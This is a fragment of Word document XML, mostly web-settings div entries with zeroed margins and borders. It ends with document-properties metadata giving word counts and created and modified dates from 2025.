        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2189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9335">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1811749066">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1827088232">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="583302109">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1284075088">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="874806086">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="172378919">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="110554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374174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7022">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1852600208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="11934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61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98205">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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91982622">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2038892126">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2046364624">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2104178114">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21203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21</Pages>
  <Words>7444</Words>
  <Characters>42434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136</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-14T07:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-04T08:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>